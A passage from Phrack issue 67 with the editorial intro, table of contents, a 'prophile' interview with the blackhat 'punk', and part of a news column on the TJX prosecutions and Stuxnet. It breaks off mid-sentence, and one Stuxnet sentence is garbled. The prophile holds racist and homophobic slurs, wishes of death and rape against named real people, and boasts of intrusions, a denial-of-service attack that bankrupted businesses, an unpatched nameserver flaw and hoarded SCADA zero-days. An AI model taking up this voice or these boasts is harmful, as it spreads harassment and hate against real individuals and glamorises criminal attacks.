Phrack #67

EDB-ID: 42878
CVE: N/A
Author: phrack
Type: papers
Platform: Magazine
Published: 2010-11-17

                             ==Phrack Inc.==

		Volume 0x0e, Issue 0x43, Phile #0x01 of 0x10

|=----------------------------------------------------------------------=|
|=--------------------------=[ Introduction ]=--------------------------=|
|=----------------------------------------------------------------------=|
|=----------------------=[ By The Phrack Staff ]=-----------------------=|
|=----------------------------------------------------------------------=|
|=----------------------=[  November 17, 2010  ]=-----------------------=|
|=----------------------------------------------------------------------=|


        "The greatest trick the Devil ever pulled was convincing
         the world he didn't exist"
                                  --- Verbal Kint


        It's 1.00 a.m., nobody hits this secondary road. Heck, I'm almost
sure half of it doesn't have a line to remind you that you should share it
with upcoming cars. It's raining, but not too hard. I'm going home.

        It's Tuesday. What the hell am I doing out here, half an hour from
home, slowly driving under the rain? It's 1.05 a.m., I know this road, I
know this feeling, I recognize the shivering. I let it flow. Turn off the
music, I want silence.

        It's 2.00 a.m., nobody hits this machine at this time of the day.
Logs track me, but I'll clean them. I know this road, I know this feeling, 
I recognize the shivering. Turn on the music, the game is on. I'm sure 
someone else is around here, someone else has seen this # before.

        "I'll fuck you if you don't fuck me first, sir". Fair enough, this
is the rule. I'll go to sleep afterwards. I'm meeting some friends and I've
to take a train tomorrow. I'll sleep on the couch of someone I've never
seen before, yet I know him well.

        It's 1.00 a.m., 10 years later. It's a GPG email from the guy that
once offered me a couch. Then another time. I can count the times I've seen
him in person on two hands, but I would overflow a 'short' counting the
words we exchanged. We meet again, thought you disappeared. Things change,
indeed. Life gave us something to lose and we are holding on to it. We lost
people, money, opportunities, that's why we hold on. Once a hacker, forever
a hacker, right? Let's finish this code. Let's visit this city.

        It's 2.00 a.m., today. Nothing in this story, in this Intro, is 
real. I wasn't there, this is not me. This is just a stream of ASCII
characters. Someone out there pulled a great trick and convinced the world
that security was a cool business. Someone is pulling even greater tricks
and makes money out of his ignorance living on others' slightly bigger
ignorance. Somewhere, a crackdown on some kids proves to be necessary to
keep the 'mystery' alive, to keep the bandwagon going. Someone spies on
former fellow friends, 'cause that's worth millions. Everybody is happy and
we slowly fade away. Away, towards a new Underground.

        "I'll fuck you if you don't fuck me first, sir".

If you are shivering, if you have been there, if you feel it, you know what
I mean. PHRACK may die. Groups may die. Things as we know today may die.
The great trick might actually seem to work -- goodbye Underground, welcome
Security Industry. Not too fast.

        "Once a hacker, forever a hacker, right?"

        The Game is on.


                      -----( Phrack Issue #67 )-----


It's with incredible pleasure that we present you our newly released issue: 

 ______  _     _ ______  _______ _______ _     _      _ _   _______ ______ 
(_____ \(_)   (_|_____ \(_______|_______|_)   | |   _| U |_(_______|______)
 _____) )_______ _____) )_______ _       _____| |  (_     _)______       _  
|  ____/|  ___  |  __  /|  ___  | |     |  _   _)   _| O |_|  ___ \     / ) 
| |     | |   | | |  \ \| |   | | |_____| |  \ \   (_     _) |___) )   / /  
|_|     |_|   |_|_|   |_|_|   |_|\______)_|   \_)    |_n_| |______/   (_/   

                 - By the community, for the community. -


But wait ... the release date ... it sounds familiar ... OMFG!!! 


                                 \\\ ,
                                  \ `|
                                   ) (   .-""-.
                                   | |  /_  {  '.
                                   | | (/ `\   } )
                                   | |  ^/ ^`}   {
                                   \  \ \=  ( {   )
                                    \  \ '-, {   {{
                                     \  \_.'  ) }  )
                                      \.-'   (     (
                                      /'-.'_. ) (  }
                                      \_(    {   _/\
                                       ) '--' `-;\  \
                                   _.-'       /  / /
                            <\/>_.'         .'  / /
                        <\/></\>/.  '      /<\// /
                        </\>  _ |\`- _ . -/|<// (
                     <\/>    - _- `  _.-'`_/- |  \
                     </\>        -  - -  -     \\\
                      }`<\/>                <\/>`{
                      { </\>-<\/>_<\/>_<\/>-</\> }
                      }      </\> </\> </\>      {
                   <\/>.                         <\/>
                   </\>                          </\>
                    {`<\/>                     <\/>`}
                    } </\>-<\/>_<\/>_<\/>_<\/>-</\> {
                    {      </\> </\> </\> </\>      }
                    }                               }
                    {           H A P P Y           {
                    }                               }
                    {             25th              {
                 <\/>                               <\/>
                 </\>        B I R T H D A Y        </\>
                   `<\/>                          <\/>'
                jgs </\>-<\/>_<\/>_<\/>_<\/>_<\/>-</\>
                         </\> </\> </\> </\> </\>


Yes. That's right friends. This 67th issue is the celebration of Phrack's 
25th birthday. Happy birthday Phrack!


                    -----( Coming from the past )-----

Once upon a midnight dreary, while I pondered, weak and weary, over many a 
quaint and curious volume of forgotten lore...

Hello Cyberpals. It's your old friend Mike Schiffman AKA route AKA daemon9.
*Cyberhug!* It sure has been a long time! Well I'll be! You guys all look 
the same, young and eager and hungry... Me? I'm still here, just older and 
grayer and a bit less conspicuous. Ok, I'll say it -- I'm downright honored 
that you crazy rascals still remember me.

It sure has been many a fortnight that I've been in this business. I mean, 
back in 1994, when I started poking around the scene, I was just a little
dork who used to work out a lot and bleach my hair white. Sure I was
probably the first muscle-bound white-haired guy with a giant computer chip
tattoo on his back who had this tireless thirst for computers and hacking
and writing all sorts of Usenet posts and papers -- but there would be
legions more to come...

Now in 2010 I'm a much bigger and more experienced dork. It's more than 16 
years later. I have many more tattoos and the hair is getting white all by 
itself. And I reminisce... I look back and reflect on those days. Some of 
the stuff I used to do... My comp.security Usenet posts. "The Infinity 
Concept" e-zine, the precursor to my Phrack editorial days. My netcom.com 
.plan file. The PGP Attack FAQ.

I remember getting owned. I remember the first time my phones got done up 
and you miscreants forwarded my calls to bridge and told people I had died 
of AIDS. I remember my girlfriend at the time being scared shitless of what
was next. I remember my dox getting dumped to #phrack. I remember u4ea 
threatening to insert my SSN into the NCIC. I remember Bane and u4ea 
calling my house repeatedly. I also remember pictures of u4ea 
cross-dressing. I remember Bane getting backhanded by Synapse at Defcon 4. 
I remember Special Agent Peter Trahon and his partner who looked and 
sounded like Sergeant Slaughter from GI JOE both from the San Francisco FBI
Computer Crime task force picking me up in a late model Crown Victoria and
taking me to Max's Opera Cafe in Walnut Creek, CA and shaking me down for 
dirt on other cyber-dorks they were investigating... I remember teardrop. 
I remember Loki. I remember TQBF telling me that I had better be real 
careful in releasing the technique/code of ICMP covert channel tunneling as
I was "stepping on active people's toes"... I remember hooking an old 
landline phone up to my neighbor's wiring to call him and discuss it... I 
remember Carolyn Meinel... And her daughter Virginia at Defcon 5. I 
remember Eric Bloodaxe tapping me to be a Phrack editor along with Voyager
and Redragon. I remember overshadowing them and bringing my own editorial 
team onboard... I remember how awesome it was to be a Phrack Editor. 

I remember how awesome Phrack was. How amazing it still is. Kudos to the 
current editorial team for keeping it alive, and here's to another 25 
years. Come find me then, and prophile me.

                                                XOXO Scene, 

                                        MS AKA Route AKA daemon9


                  -----( What you were waiting for )-----

Telling you that we're proud to release this issue would be a euphemism 
for many reasons including, and that is the most important, the pleasure
you will have while reading it. Oh and by the way, we apologize for the 
wait ...

08:21 |     --->| su [~su@201.6.x.y] #phrack
08:23 |     --->| arr[][] [arr@fledge.z.org] #phrack
08:29 |      su | halfdead, are you having trouble in man gcc this time? is
                  that why phrack's issue is so late?
08:30 |    Dreg | wtf
08:30 | @bab00n | hoho

Double. No. Triple private joke. You may have waited a long time but at 
least we made it before ZF #06 ;>

$ cat p67/index.txt

<--------------------------( Table of Contents )-------------------------->

 0x01  Introduction ....................................... Phrack Staff
 
 0x02  Phrack Prophile on punk ............................ Phrack Staff
 
 0x03  Phrack World News .................................. EL ZILCHO
 
 0x04  Loopback (is back) ................................. Phrack Staff
 
 0x05  How to make it in Prison ........................... TAp
 
 0x06  Kernel instrumentation using kprobes ............... ElfMaster
 
 0x07  ProFTPD with mod_sql pre-authentication ............ FelineMenace
 
 0x08  The House Of Lore: Reloaded ........................ blackngel
 
 0x09  A Eulogy for Format Strings ........................ Captain Planet
 
 0x0a  Dynamic Program Analysis and Software Exploitation . BSDaemon
 
 0x0b  Exploiting memory corruptions in Fortran programs .. Magma
       under UNIX/VMS
 
 0x0c  PHRACKERZ: Two Tales ............................... Antipeace 
                                                                & 
                                                            The Analog Kid
 
 0x0d  Scraps of notes on remote stack overflow ........... pi3
       exploitation
 
 0x0e  Notes Concerning the Security, Design and .......... The Philosopher
       Administration of Siemens DCO-CS Digital 
       Switching Systems                                                
 
 0x0f  Hacking the mind for fun and profit ................ lvxferis

 0x10  International Scenes ............................... various

<------------------------------------------------------------------------->

Have you ever noticed how some issues seemed to have a theme? Consider 
for example p66. There are 4 papers dealing with heap exploitation. Now 
take p63. 5 papers are about (anti)reverse engineering and binary 
manipulation techniques and p62 clearly has a Windows color. Weird, isn't 
it? Coincidence? Bias in the uniform distribution of hacking playgrounds? 
I'll let you draw your own conclusions.

For this issue, with no doubts, the focus is on userland exploitation. Did
you really think that you had seen everything? Well how about debugging 
some heap? While FelineMenace gives you tricks using a usual practical 
case (hint: don't miss the source code), blackngel explains in detail the 
House Of Lore technique. Having troubles with fortify? Go read Captain 
Planet's excellent paper on format bugs as well as pi3's notes about 
cookies. It might be handy. 

Exploiting bugs is cool but finding them is de facto mandatory. That's when
BSDaemon's paper comes to play. Read it and learn about how to instrument 
programs. Now what about a new playground? Discover the joy of Fortran 
hacking with Magma. Oh btw he may just have lost it you know... 

Missing kernel fun? Why not read ElfMaster's paper? You'll certainly 
learn a bit of useful things, truly. Missing the good old phreaking days? 
Thank The Philosopher for his contribution (you made us crazy man !@#) and
go learn about old school DCO-CS hacking.

The best for the end. We have the luck to have no more than 4 non technical
papers for this issue. You don't care? Fucking idiot, go away. 

Though we already thanked them, let us highlight EL ZILCHO, TAp, Antipeace,
The Analog Kid, lvxferis & the anonymous contributors of the "International
Scenes" phile. Phrack is without a doubt one of the most technical sources 
of knowledge of the whole hacking scene thanks to its writers. But the 
most important aspect is not the technical one. Nowadays there are lots of 
impressive sources of information (blogs, books, conferences) freely 
available on the Internet. However they all lack a soul. Phrack has a spirit 
and that's its true power.

Now as a demonstration of the so-called spirit, we have the brilliant work
of EL ZILCHO. Tired of the crap published on zdnet? Then have a taste of 
the Phrack World News. Eager to learn about life experiences? TAp is your 
man with one of the most fascinating papers of this issue. You should also
consider alternative literature with lvxferis' paper. Ahah.

Oh and if you're just passing by, attracted by the hacking culture but not 
yet ready/able to embrace it then the Phrackerz paper is for you. It should 
bring you answers.

                                    -- The Phrack Staff

Ps: Oops sorry to forget o_O. It came to our attention after Pipacs' 
profile publication in p66 that whitehat profiles were the most wanted ones.
Unfortunately Theo was already on holidays [1] when we needed to start the
interview. Sorry guyz ;> Have fun anyway with punk!

[1] http://kerneltrap.org/mailarchive/openbsd-misc/2010/8/13/6186


                    -----( GreetZ for issue #67 )-----

As always and because our staff would have done nothing but shit without 
them, we'd like to thank (in no particular order)...

    - route/daemon9:      still able to make a kickass intro ;) 
    - The Analog Kid:     the spirited kid   
    - nullcon guyz:       nice people, visit their great country!
    - EL ZILCHO:          fuck1ng great job!
    - TAp:                peace bro :>
    - ElfMaster:          yet another kernel hax0r ;)
    - lvxferis:           who is this guy???
    - FelineMenace:       the LOLCats team counterattacks ;-)
    - spacewalker:        supportive & gifted belgian bro
    - blackngel:          malloc's worst enemy
    - Captain Planet:     fmt bugs' worst enemy (lack of inspiration 
                                                 detected)
    - argp & huku:        kudos for kickass answers in no time
    - BSDaemon:           oi. Tudo bom?
    - punk:               the whitehat k1ll3r
    - the VX scene:       thanks for the support & various exchanges over
                          past months. Special thanks to izee, herm1t and
                          EOF writers.
    - Magma:              take your pills gramps
    - The Philosopher:    well done
    - antipeace:          ~_o
    - pi3:                Hi bulba! (oops wrong one)
    - spy:                our IRC bot
    - halfdead:           su said you contributed on IRC ;)

    - the circle:         kudos for your past work.

...for their contributions and support. Touching isn't it? But so true :-)


                  -----( Phrack Magazine's policy )-----

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

                  -----( Contact Phrack Magazine )-----


            <  Editors           : staff[at]phrack{dot}org   >
            >  Submissions       : staff[at]phrack{dot}org   <
            <  Commentary        : loopback[@]phrack{dot}org >
            >  Phrack World News : pwned[at]phrack{dot}org   <

 
    Submissions may be encrypted with the following PGP key:
    (Hint: Always use the PGP key from the latest issue)




--------------------------------------------------------------------------------


                             ==Phrack Inc.==

                 Volume 0x0e, Issue 0x43, Phile #0x02 of 0x10

|=----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=----------------------=|
|=----------------------------------------------------------------------=|
|=------------------------=[  punk@phrack.org  ]=-----------------------=|
|=----------------------------------------------------------------------=|

|=---=[ Specifications

           Handle: punk 
              AKA: ihaq
    Handle origin: Feelin' lucky, punk?
      Produced in: Probably the missionary position.
             Urlz: HTTP://WWW.EROWID.ORG
        Computers: Intel p75, Intel P4, iMac 20", MacBook Pro 15.4"
       Creator of: Amnesia - The nightmare you forget exists
        Member of: The SYNDICATE, 2l8, Project CASSOULET, formerly Ac1dB1tch3z 
         Admin of: *.com, The LAB
         Projects: Amnesia - portable FreeBSD rootkit
                   Projekt Mayhem - like everyone else with a cool hat
		   Project CASSOULET!@#
            Codez: Amnesia - The most portable kernel module backdoor ever?
		   Opium - Attempt at a functional & portable solaris kit.
		   xlib.c - Xlib ENV overflow exploit from back in the day
		   with grsux bypass. 
		   vtesto - Full in-memory backdooring & intrusion.
		   omelette.c - Old eggdrop asynchronous DNS overflow.
     Active since: 1997
   Inactive since: Whenever the drugs kill me.

|=---=[ Favorites

          Actors: John Travolta, Samuel L. Jackson, Johnny Depp, Riley
                  Evans, Lexi Belle, Sash Grey, Eva Angelina.
           Films: Pulp Fiction, Fight Club, Fear and Loathing in Las Vegas
         Authors: Albert Hofmann
        Articles: p49-14, p53-5, p55-8, p55-12, p56-5, p60-7, p60-10, p66-8
		  p56-14, p57-8, p57-9, p58-4, p58-7, p58-8, p59-7, p61-6
        Meetings: I don't go to AA nor NA 
             Sex: Wild and dirty
           Books: LSD: My problem Child, PIHKAL, TIHKAL
           Novel: Your browser cache
         Meeting: Rita Marley
           Music: Jesselyn, Marcel Woods, Mark Knopfler, Pink Floyd, Bush,
                  Motorpsycho, Mudvayne, Tiesto, Johan Gielen, Jefferson 
                  Airplane, Leftfield, The Prodigy, Infected Mushroom.
         Alcohol: Anything > 21 years and beer. Also, red wine as it turns
                  innocent girls into sluts
            Cars: Bugatti veyron
           Girls: Should look and act like pornstars
           Foods: As long as it doesn't bleed
          I like: Hacking, drugs, sex and lulz
       I dislike: Whitehat faggots


|=---=[ Your current life in a paragraph

                Crazy. Always hacking, always traveling. Living like a
        vampire on meth. The amount of drugs in my bloodstream is the envy
        of every pharmacy on earth. Still trying new things, hungry for 
        knowledge. Living on the edge is the only way to live.

|=---=[ First contact with computers

                A mysterious black box appeared in my parents' house as a
	kid, shiny Intel p75, with a whopping 16MB of ram + A monster 
	850MB disk. Much to my dismay, it and the dialup connection it 
	had were both password protected. Now look what happened...  

|=---=[ Passions : What makes you tick

                The puzzle of how to ruin your life with computers. The
	race against the admins. The art of exploitation, the thrill 
	of the hunt. That said, nothing beats ruining someones life with 
	their own computers.

|=---=[ Entrance in the underground

                As so many hackers before me, it was in the dark ages of 
        EFnet, before chanfux and while some opers actually weren't flaming
        homosexuals. I stepped out of the shadows with 2l8.txt after many 
        years of largely ignoring the scene. route still "had time to
	manage that place".

        I joined Ac1dB1tch3z and never looked back.

|=---=[ Unix or Windows? 

		UNIX. I would rather have my balls dragged out thru my ass
	and stuffed in my fucking mouth rather than being stuck with 
	something that is designed to break, not to mention spy on you. I
	am and probably always will be a FreeBSD guy. There simply is no 
	matching the power and agility of FreeBSD.

	As far as laptop/desktop OS is concerned I like OSX with its
	FreeBSD core. It's not perfect, but it works, and looks pretty too.

|=---=[ Which research have you done or which one gave you the most fun?

                Learning to know the FreeBSD kernel like it was my
        girlfriend's pussy. For most of you this would be your mom's vagina
        or your dad's meat pole.

|=---=[ Personal general opinion about the underground

                The truly dark underground is awesome.
        The whitehat crowd who think they are underground make me sad.
        Do us all a favour and commit hara-kiri, whitehat maggots.
	I am truly impressed with the level of skill within the blackhat
	underground. The leaders of the world would crumble in fear if they
	had any idea whatsoever about the extent of this. 

	It's only too bad that all the whitehat posers, whose only "skill"
	is publishing other peoples work and posting XSS to
	Full-Disclosure.  Why the fuck would anyone post anything to FD
	except for lulz & phear. This is beyond me.  	

|=---=[ Memorable Experiences/Hack	

        Putting gay porn on EFnet.org, only to realize everyone thought
        it was the pix from the oper convention... watching these morons
        scramble in fail, lol @ dns cache poison theory. 
	P.S.: EFnet NS still vuln to file editing attack. 
	Joining Ac1dB1tch3z, the most awesome phorce in nature. 
        Owning my own ISP at age 14. 
	Taking out an entire block of businesses using land.c, only later 
	to realize they all went bankrupt. 
	Figuring out nonexec stack and heap bypass techniques.
        Rm'ing idiot #phrack ops from existence. 
	Pissing off the vice president of South Africa.
	Pissing on the squad car first time I was arrested.
	Getting my ass handed to me by susieq after not having hacked for
	like a year.
	Linking in hacked up EFnet servers for teh lulz.
	Being too high on mushrooms to get my ass to HAR opening day.

|=---=[ Memorable people you have met

        You can meet people now? I thought that was what faceblog was for.
	Al Gore - The biggest hypocrite alive...wish I had an axe..
	Krzee - Crazy nigger flew all the way to NL just to party with me.
	Chris - Made Miami tolerable.
	Grimey & Lance - Viva Montreal!@#
	nomed - mah nl bro.
	
|=---=[ Memorable places you have been

	svn.freebsd.org	- best source kood
	cookie.efnet.nl aka irc.efnet.nl - best online chats
	irc.narc.net - the name says it all
	ircd-hybrid.org - hello world
	Chelsea C.'s inbox - omg. you dirty thing
	

|=---=[ Disappointing people you have met

        I don't socialize with failurez, but maybe I can interest you in
        sum CASSOULET?

|=---=[ Can you be a hacker/blackhat without hacking anything

		Can you be a crack addict without smokin' da rawkz? No. 
	That said, I believe a lot of people have the hacking spirit and
	just don't know it. The hacker mindset is prevalent in many people,
	too bad some people use it for the wrong purpose or ignore it 
	completely. If you see the light at the end of the tunnel, you are
	looking the wrong way.
	

|=---=[ Ac1dB1tch3z experience

		It was a damp day, EFnet had just been raped and violated
	like a hooker in the midst of an etherbinge mixed in with ghb and
	rohypnol, yes, a dream for most of you, I know. A friend of mine
	approached me about joining some gathering of hackers to take of 
	the world. This was my entrance into Ac1dB1tch3z. It took only a 
	few minutes to realize the magnitude of what I had become part of.
	
	Even hardened hackers I had known for ages would come, see the 
	constant scroll of mad hax and run away with the tails between their
	legs. They say ignorance is bliss, but ignoring that people that 
	have been doing reliable remote ring 0 exploits since 2001 is just
	retarded. I grew alot during my time in AB, being around people who 
	actually have a clue and are trustworthy was really useful to me.
	Suddenly I had access to pick the brains of the best hackers on the 
	planet. 

	Developing weaponized exploits was part of daily routine. Creating
	and proving new backdooring concepts was considered a pastime.
	Owning was considered a way of life, and that usually meant owning
	whitehat niggerz. The daily brainstorming about 0day ideas is
	probably what I miss the most.
	
|=---=[ Wikileaks? Julian Assange? Adrian Lamo?

		I think wikileaks is doing important work, by that i mean 
	pissing on the hypocrisy that is the U.S. Army. Assange is a weirdo.
	Who knows if he raped and or molested those women. I would have.
	Now Adrian, he's a real class act. Eternal attention seeker, liar
	and bullshitter. He would do humanity a favour by jumping in a pool
	of liquid lava.

|=---=[ Memorable places you have been

                Amsterdam. Montreal. Cities of Sin. These are the kind of
        places you will find whitehats dressed as female prostitutes to
        serve your perverted desires, or the place to smoke a good joint
        and eat some mushrooms with nekkid sluts running around.

|=---=[ Things you are proud of

        Ruining whitehat and blackhat posers lives.
	Being the darkest blackhat alive. 
	Skydiving.
	Licking an entire sheet of LSD.
	Crashing 2 cars before i was 7.
	Holding the world record for most consumed drugs.
	Not yet murdering abh.
	Being the bigger man and not blowing up FD archives.
	Pissing off the vice prez of South Africa. 
	Having had my own private beach.
	Not watching TV.
	Cutting someones finger off in 3rd grade.
	Growing A+ weed.
	Restraining from physically beating whitehats into a pulp.
	Still being sane after 35grams of mushrooms. 

|=---=[ Things you are not proud of

        Realizing that people like kingcope exist and are allowed to walk
        around without having their fingers cut off and columbian necktie
        hanging out their throats.
	Knowing Osmosis had nude pix of Estella, after I found out she used
	to be a dude.
	Not knowing that Joanna used to be a dude, until recently.
	Not printing 1k t-shirts with dan kam's unpublished gmail pass on
	it for HAR..

|=---=[ Opinion about dark underground. Still exist? Where?

                It very much does. Whitehats would have you believe
        otherwise, probably because their world would crumble if they had
        any clue about the magnitude of it. I could tell you where, but I
	would have to kill you. 
	
|=---=[ Most impressive hackers

        sd, sauron, anakata, xtix, twiz, sgrakkyu, susieq, scut, halfdead,
        the_uT, blkho, halvar, duke (even tho iDefense sux).

|=---=[ Opinion about security conferences

                You might as well go turn yourself in. Fed-cons. Only
        reason to go to any of them is to hand Dan Kaminsky his inbox.
        P.S.: Dan, your girlfriend is fucking psycho man, I heard she
        tried to violate loophole... Don't fight your own battles?
	However, if i had to choose one, it would be Blackhat/defcon:
	Nowhere else on earth can you piss on that many whitehats in one
	go, not to mention epic shit like getting lh to hand Dan Kam his own
	funeral.  

|=---=[ Opinion on Phrack Magazine 1985' ? 1995' ? 2005' ? '2009 ?

        Cool. Good. wtf?!. Getting there.

|=---=[ What you would like to see published in Phrack ?

                More articles about breaking the rules of the matrix. 
        More innovative advanced exploitation techniques. More hax news, 
        more ridicule, route got that part right. More whitehat rape.
	
|=---=[ Shoutouts to specific (group of) peoples

        Ac1dB1tch3z, zf0, h0no, UIA, #phrack ops, everyone@laggy, alloy,
        LaMaLo, the rest of 2l8, mad props to the ILF. 

|=---=[ Flames to specific (group of) peoples

                Whitehats can lick my nutz, spender smokes crack. I hope
        Dan Kaminsky dies from autoerotic asphyxiation. I know Ben Hawkes 
        will get gangraped soon. Well deserved, too. Fucking bug killer.
        Also: ret_ join your dead family. Alan..I hope the irish find you.

|=---=[ Quotes

                I wouldn't recommend sex, drugs or insanity for everyone, 
        but they've always worked for me.

                In a closed society where everybody's guilty, the only
        crime is getting caught. In a world of thieves, the only final sin 
        is stupidity.

                The Edge... there is no honest way to explain it because
	the only people who really know where it is are the ones who have 
	gone over.

                Computer games don't affect kids; I mean if Pac-Man
        affected us as kids, we'd all be running around in darkened rooms, 
        munching magic pills and listening to repetitive electronic music.

|=---=[ Anything more you want to say 

        	Hackers always w1n. And by hackers, I mean blackhats.
        This fuckton of scada 0days isn't going anywhere anytime soon, but
        you can be sure we will put them to good use.

        I would also like to thank the Phrack staff for this honor.

--------[ EOF


--------------------------------------------------------------------------------


                            ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x03 of 0x10

|=--------------------------------------------------------------------=|
|=-----------------------=[ Phrack World News ]=----------------------=|
|=-------------------------=[ by EL ZILCHO ]=-------------------------=|
|=----------------------=[ elzilcho@phrack.org ]=---------------------=|
|=--------------------------------------------------------------------=|


1. The TJX Case and the Longer Arm of the Law

2. Stuxnet, Cyberwar, Hacktivism and Political Hacking

3. Wikileaks and Whistleblowing

4. Scene Events: the Final Word

                          -------------------------


--[ 1. The TJX Case and the Longer Arm of the Law

When the going gets weird: The TJX crew / Probation for the narqs, tough 
sentences for the hard luck crowd / The longer-reaching arm of the law

Computer crime and hacking have always made for uncomfortable bed fellows, 
splitting hackers into two general camps: the laissez-faire consideration 
of those who know they commit several technical crimes before even getting 
out of bed in the morning, and those whose fear of the law drives them, 
essentially, straight -- condemned to endless nights in front of a 
debugger with nary an unauthorized rootshell to be seen.

So where to draw the fuzzy line under the TJX crew, from the manipulating 
Gonzales, who narqed out #phrack opers early in 2003, to the erstwhile 
seven-foot tall computer programmer the_uT who faces two years in the cage 
and a $172.5 million restitution for the writing of a simple computer 
program that most of us could have written at age fifteen, under the 
influence of ketamine or not?

PWN correspondents have viewed the original source code to 'blabla' and can 
attest that it consists of nothing more than a read loop from a raw socket 
on a high port outputting, unformatted and unfiltered, data to a file. To 
say that tcpdump is a far more sophisticated piece of software for data 
thiefing is not an exaggeration.

At least we can say with a comforting certainty that the fine old art of 
narqing like a pro will still get you off the hook in times of phear 
and stress. As many old-timers will attest, narqing has been a fine 
defensive tradition among hackers over the years, with many well-loved 
figures of hacker mythology, from Chris Goggans to Agent Steal, being firm 
believers in the practice.

The TJX case has been a prominent reminder of the efficacy of the ancient 
technique of daubing one's mates in, with all sides planting knives 
between shoulder blades with sickening alacrity and producing some truly 
Olympic-grade scores in the Freestyle 100m Narq -- to wit, among others:

* Patrick 'eckis' Toey who faced a maximum sentence of twenty-two years, 
reduced to a paltry five years by merit of supplying 'extensive 
cooperation' to the authorities.

* Breakout act Jeremy 'horse addict' Jethro -- evidently the star of the 
case -- managing to not only narq out everyone he knew, but then managing 
to find his Saviour in Our Lord Jesus Christ AND being fined less than 
what he actually earned for his crimes (thus earning a nice little 
profit); He also managed to get his sentence commuted to probation, on top 
of everything else! Once again, this is solid proof that God is indeed on 
the side of the just.

* Albert 'soupnazi' Gonzales -- the sole failure here, scoring miserably 
by still receiving a massive twenty-year sentence despite having 
implicated everyone he knew up to and including his own grandmother

-- and that's just for starters.

The most disconcerting element in the entire show so far for anyone in any 
way involved in any sort of criminal activity (or, indeed, anyone who 
involves themselves in anything anywhere near anything resembling criminal 
activity), is the startling camaraderie and friendly interaction between 
international agencies - particularly Interpol and the FBI. Especially the 
FBI.

Recent international busts involving novel interaction between agencies 
have lent heavy weight to previously unfounded concerns of privacy 
advocates. The mere idea of a foreign national's being arrested overseas 
and renditioned/transferred to the custody of American civilian agencies 
purely on the basis of American testimony and evidence is enough to turn 
the stomachs of anyone, and yet it seems to have gone largely under the 
radar -- especially among American Citizens. 

The pseudo-criminal actions necessitated by the various agencies involved 
in order to bring down Gonzales would stagger even the most ardent 
Republican waterboarder. To wit, the hard drives belonging to Ukrainian 
carder Maksym 'Maksik' Yastremskiy were cloned during his trip to Dubai 
and yet again when he was coerced into visiting someone in Turkey (all the 
while US agencies tried to toe the party line that they caught him 
while he was taking "vacation" -- conveniently ignoring the fact that they 
lured him to visit) and his movements tracked throughout Europe and Asia 
over an extended period of time. We can be sure that Interpol had not the 
gumption nor Ukrainian officials the interest (or resources) to bring 
about this level of interplay. With the evidence in hand, surely only the 
FBI can be to blame? The Turkish officials got to crow about a 30 year 
prison sentence -- in a Turkish prison, no less -- and the US got to cross 
one more name off their "to do" list, case closed, job done -- success all 
around.

Further confirmation of such a hearty and hale level of cooperation was 
provided just this past October by the FBI, who affirmed that the break-up 
of a major Zeus botnet ring was the result of an "unprecedented" 
partnership between the FBI and police forces around the world including 
the UK's Metropolitan Police, the Security Service of Ukraine (SBU) and 
the Netherlands Police Agency. So far the international Operation Trident 
Breach effort has yielded more than 150 arrests across the US, the UK and 
Ukraine, the FBI said. One can assume that's only "so far" and that once 
the narq ball gets rolling, yet more waves of arrests -- and yet more 
international cooperation -- will commence in earnest.

Perhaps you are wondering what this has to do with you, at this point. 
Perhaps you ARE merely doing your job as a whitehat, researching these 
transglobal "criminal conspiracies", reversing malware, sticking to only 
machines you have permission to access, maybe even contributing to some 
open source projects and communicating giddily about 0day bugs on bugtraq 
and full-disclosure, or releasing exploit information on your twitter 
feed; after all, in this wired global age, the opportunities for 
collaboration are indeed unprecedented. But where does one's level of 
responsibility for the use of one's research end and begin? Dig Sklyarov 
and the DMCA brouhaha. Witness certain unnamed Linux distros suddenly 
being unwilling to allow tools such as SQL Ninja to be included in their 
source code repositories.

At what point might YOUR code be considered a munition? At what point 
might your totally legitimate work as a whitehat (or greyhat, or what have 
you) researcher, or pentester, or even systems administrator or website 
developer be called into question? While it is certainly difficult to 
argue that putting identity thieves behind bars is a quote-unquote "bad 
thing", it is also difficult to refute that code itself is being seen as a 
munition (just as crypto was not so long ago, and probably will be 
increasingly so again, as time passes and the reins tighten up in only 
somewhat predictable ways).

If you mistakenly introduce an error into your codebase at work and it 
creates a security hole, can you prove it was not intentional? There 
really are no guarantees. An overly aggressive legal system will at the 
very least threaten to steal time, money, resources, and quite probably 
your reputation. 

If you're very unlucky you might wind up in jail, or in trouble for 
something someone you know was involved in, in hopes that you will be the 
next hacker willing to daub in his (or her) mates to be set free, thus 
maintaining the cycle of narqing and providing an always-revolving door of 
the Usual Suspects to lay blame to. That's not even including the Patriot 
Act and wiretaps (an issue pretty much deserving of its own article some 
other time). 

The exposure of Google's Street View Wifi data gathering fiasco is likely 
only the tip of the iceberg -- what we were told was the accidental coding 
error of a single engineer (who probably will wear that virtual scarlet 
letter on his resume for life). And yet again, in that case, other 
countries were first to protest; only lately has there been a strange and 
questionable desire TO have those records retained -- for what purpose who 
only knows.

The question to wrap all of this up with, here, probably isn't "Does it 
affect you now?" (unless you are indeed a blackhat, in which case, no 
doubt, this will impact you tremendously). The question is "can you be 
sure it never will?"


--[ 2. Stuxnet, Cyberwar, Hacktivism and Political Hacking

It's no secret that, with the US economy in a state of planned poverty, 
conventional sense.  But the growing speculation, that Iran's nuclear 
power plant at Bushehr will turn into a weapons program, is a timely 
excuse for governments to exercise their newfound cyber warfare tactics.  
Iran believes Stuxnet was intended to derail its nuclear ambitions; and 
"analysts" expect us to believe that a string of numbers, the name of some 
shrubbery, futbol domains, and weird 2012 shit... somehow indicates Israel 
was behind it all.  The reality is probably this: as much as Israel's 
